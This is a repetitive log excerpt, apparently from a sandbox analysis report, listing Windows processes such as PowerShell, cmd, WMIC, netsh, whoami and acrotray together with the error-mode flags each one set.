Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\acrotray.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\acrotray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
